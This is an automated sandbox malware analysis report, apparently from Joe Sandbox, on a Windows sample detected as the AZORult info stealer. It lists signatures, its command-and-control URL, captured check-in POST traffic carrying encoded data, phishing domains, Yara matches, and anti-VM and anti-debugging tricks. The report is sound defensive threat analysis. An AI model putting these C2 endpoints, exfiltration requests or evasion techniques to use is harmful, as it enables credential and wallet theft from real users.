Windows Analysis Report 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Overview

General Information

Sample Name: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Analysis ID: 491841
MD5: 73bd76f0549cc1992d943ddfd92a9c4d
SHA1: 802e70b76c7c0860b3a4a257b1bc96fc3430ff01
SHA256: 2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
Tags: AZORultexe
Infos:

Most interesting Screenshot:

Detection

AZORult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Detected AZORult Info Stealer
Yara detected Azorult Info Stealer
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"}
Multi AV Scanner detection for submitted file
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Virustotal: Detection: 68% Perma Link
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe ReversingLabs: Detection: 75%
Antivirus detection for URL or domain
Source: http://ww1.survey-smiles.com/% Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/e Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/z Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/sof Avira URL Cloud: Label: phishing
Source: http://ww1.survey-smiles.com/ Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: admin.svapofit.com Virustotal: Detection: 9% Perma Link
Source: survey-smiles.com Virustotal: Detection: 7% Perma Link
Source: ww1.survey-smiles.com Virustotal: Detection: 8% Perma Link
Machine Learning detection for sample
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040A610 CryptUnprotectData,LocalFree, 0_2_0040A610

Compliance:

barindex
Uses 32bit PE files
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://admin.svapofit.com/azs/index.php
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NOCIXUS NOCIXUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.242.153 199.59.242.153
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp String found in binary or memory: http://admin.svapofit.com/azs/index.php
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.com/azs/index.php8
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: http://ip-api.com/json
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.c-k
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp String found in binary or memory: http://survey-smiles.com
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.com/=
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://survey-smiles.com/csvc
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/e
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/sof
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp String found in binary or memory: http://ww1.survey-smiles.com/z
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: http://www.icq.com/legal/eula/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: http://www.icq.com/legal/privacypolicy/en
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe String found in binary or memory: https://dotbit.me/a/
Source: unknown HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Source: unknown DNS traffic detected: queries for: admin.svapofit.com
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle, 0_2_00417D84
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Uses 32bit PE files
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: String function: 004034E4 appears 32 times
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Process Stats: CPU usage > 98%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Virustotal: Detection: 68%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe ReversingLabs: Detection: 75%
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Static PE information: More than 200 imports for KERNEL32.dll

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041A068 push 0041A08Eh; ret 0_2_0041A086
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041A02C push 0041A05Ch; ret 0_2_0041A054
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E8D0 push 0040E905h; ret 0_2_0040E8FD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B164 push 0040B190h; ret 0_2_0040B188
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E908 push 0040E94Ah; ret 0_2_0040E942
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B12C push 0040B158h; ret 0_2_0040B150
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C136 push 0040C164h; ret 0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C138 push 0040C164h; ret 0_2_0040C15C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040813C push 00408174h; ret 0_2_0040816C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004171E8 push 00417214h; ret 0_2_0041720C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C9EA push 0040CA18h; ret 0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040C9EC push 0040CA18h; ret 0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E1A4 push 0040E1D0h; ret 0_2_0040E1C8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B1B8 push 0040B1E4h; ret 0_2_0040B1DC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E25A push 0040E288h; ret 0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040E25C push 0040E288h; ret 0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00414A28 push 00414A84h; ret 0_2_00414A7C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040BAB8 push 0040BAE4h; ret 0_2_0040BADC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00409B54 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00409B78 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040D378 push 0040D3A8h; ret 0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040D37C push 0040D3A8h; ret 0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413B7C push 00413BA8h; ret 0_2_00413BA0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B3D8 push 0040B414h; ret 0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B3DC push 0040B414h; ret 0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004183E4 push 00418410h; ret 0_2_00418408
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040BBEC push 0040BC18h; ret 0_2_0040BC10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00409B90 push 00409BC8h; ret 0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413C10 push 00413C3Ch; ret 0_2_00413C34
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00404C1C push 00404C6Dh; ret 0_2_00404C65
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0040B420 push 0040B44Ch; ret 0_2_0040B444
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00417216

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FBD94B9982Ch 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00415E40 GetSystemInfo, 0_2_00415E40
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 0_2_00413F58
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h] 0_2_00407AF0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h] 0_2_0046052B
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h] 0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h] 0_2_00460000
